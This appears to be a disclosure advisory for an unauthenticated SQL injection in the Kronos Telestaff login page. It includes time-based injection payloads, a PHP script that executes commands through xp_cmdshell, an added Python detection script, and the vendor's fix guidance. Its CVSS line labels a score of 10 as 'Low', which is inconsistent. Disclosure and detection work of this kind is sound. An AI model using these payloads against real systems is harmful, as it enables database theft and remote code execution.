"Kronos Telestaff < 2.92EU29 - SQL Injection"

Author: Goran Tuzovic
Platform: asp
Release date: 2017-06-05

Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page

Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.


Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in the login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=

The exploit requires a valid "code" in the POST body. However, in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4-digit number and can be easily discovered in ~5000 requests.

 
Proof of concept
================
PoC 1 - Extract data from the database
Example: extract benign data (here, confirm the database name) by comparing response timing.
Injection Point:  [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data: 
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>

compare timing with

device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>


PoC 2 - Execute code remotely
Example: inject a benign command, e.g. ping a remote system.

<?php
	// Encode a string as a T-SQL binary literal (0x...) so the command reaches
	// xp_cmdshell without any quote characters in the injected value.
	function strToHex($string){
	  $hex = '';
	  for ($i=0; $i<strlen($string); $i++){
		$ord = ord($string[$i]);
		$hexCode = dechex($ord);
		$hex .= substr('0'.$hexCode, -2);
	  }
	  return "0x".strtoupper($hex);
	}

	$cmd_to_execute = strToHex("ping -n 1 receive_ping_host");  // insert your own host here to detect a DNS lookup and/or ping; or insert another command
	$code = "XXXX";   // insert valid code
	$target_url = ""; // insert login page URL of target system, i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
	$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
	$payload=str_replace(" ","%20",$payload);
	// ') closes the original predicate; -- comments out the rest of the query
	$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target_url);
	curl_setopt($ch, CURLOPT_POST, TRUE);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
	curl_exec($ch);
	curl_close($ch);
?>
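Detection logic for the two payload shapes above (the WAITFOR DELAY timing probe of PoC 1 and the hex-literal xp_cmdshell chain of PoC 2), as an added example that is not part of the original advisory. It assumes a log source that captures the doLogin POST body and the IIS-style time-taken value; the sample bodies are constructed.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes taken from the two PoCs in this advisory.
RX_BREAKOUT = re.compile(r"^\s*'\s*\)")   # the ') prefix that closes the original predicate
RX_WAITFOR = re.compile(r"waitfor\s+delay\s*'(\d\d):(\d\d):(\d\d)'", re.I)
RX_XP_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.I)
RX_HEX_LITERAL = re.compile(r"\b0x[0-9a-f]{8,}\b", re.I)

# Constructed sample bodies (the code value 1234 is a placeholder, not a real one).
POC1_BODY = ("device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')"
             "waitfor%20delay'00%3a00%3a12';--&pwd=&code=1234")
POC2_BODY = ("device=stdbrowser&action=doLogin&user=')DECLARE%20@lphda%20VARCHAR(280);"
             "SET%20@lphda=0x70696E67202D6E2031206578616D706C65;"
             "EXEC%20master..xp_cmdshell%20@lphda---&pwd=test&code=1234")
BENIGN_BODY = "device=stdbrowser&action=doLogin&user=jsmith&pwd=hunter2&code=1234"

def parse_post_body(body: str) -> dict:
    """Split a URL-encoded body on '&' only; a ';' inside a payload must not split it."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def analyze_login_request(body: str, time_taken_ms: int = 0) -> dict:
    """Flag a doLogin request whose 'user' value carries the advisory's injection shapes."""
    result = {"hits": [], "delay_s": 0, "delay_observed": False, "suspicious": False}
    params = parse_post_body(body)
    if params.get("action") != "doLogin":      # only the login action carries 'user'
        return result
    user = params.get("user", "")
    if RX_BREAKOUT.search(user):
        result["hits"].append("breakout")
    m = RX_WAITFOR.search(user)
    if m:
        h, mi, s = (int(x) for x in m.groups())
        result["delay_s"] = h * 3600 + mi * 60 + s
        result["hits"].append("waitfor_delay")
    if RX_XP_CMDSHELL.search(user):
        result["hits"].append("xp_cmdshell")
    if RX_HEX_LITERAL.search(user):
        result["hits"].append("hex_literal")
    # A timing probe confirms itself when the server took at least the requested delay.
    result["delay_observed"] = result["delay_s"] > 0 and time_taken_ms >= result["delay_s"] * 1000
    result["suspicious"] = bool(result["hits"])
    return result
```

A confirmed `delay_observed` on a login request is the strongest signal that the injection actually executed, not merely that someone sent the string.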

	
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.


Solution
================
From Vendor:

Though there is no further action needed after the installation of the update, there are a couple of best practices that we suggest to further secure the production environment.
	1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses.  For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
	2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.

	
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor 
2016-01-20: Received acknowledgement of the vulnerability from the security contact at the vendor
2016-01-20: Vendor is remediating the issue 
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
 

Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass  0x736e6f646772617373 [ at ] illumant.com


About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/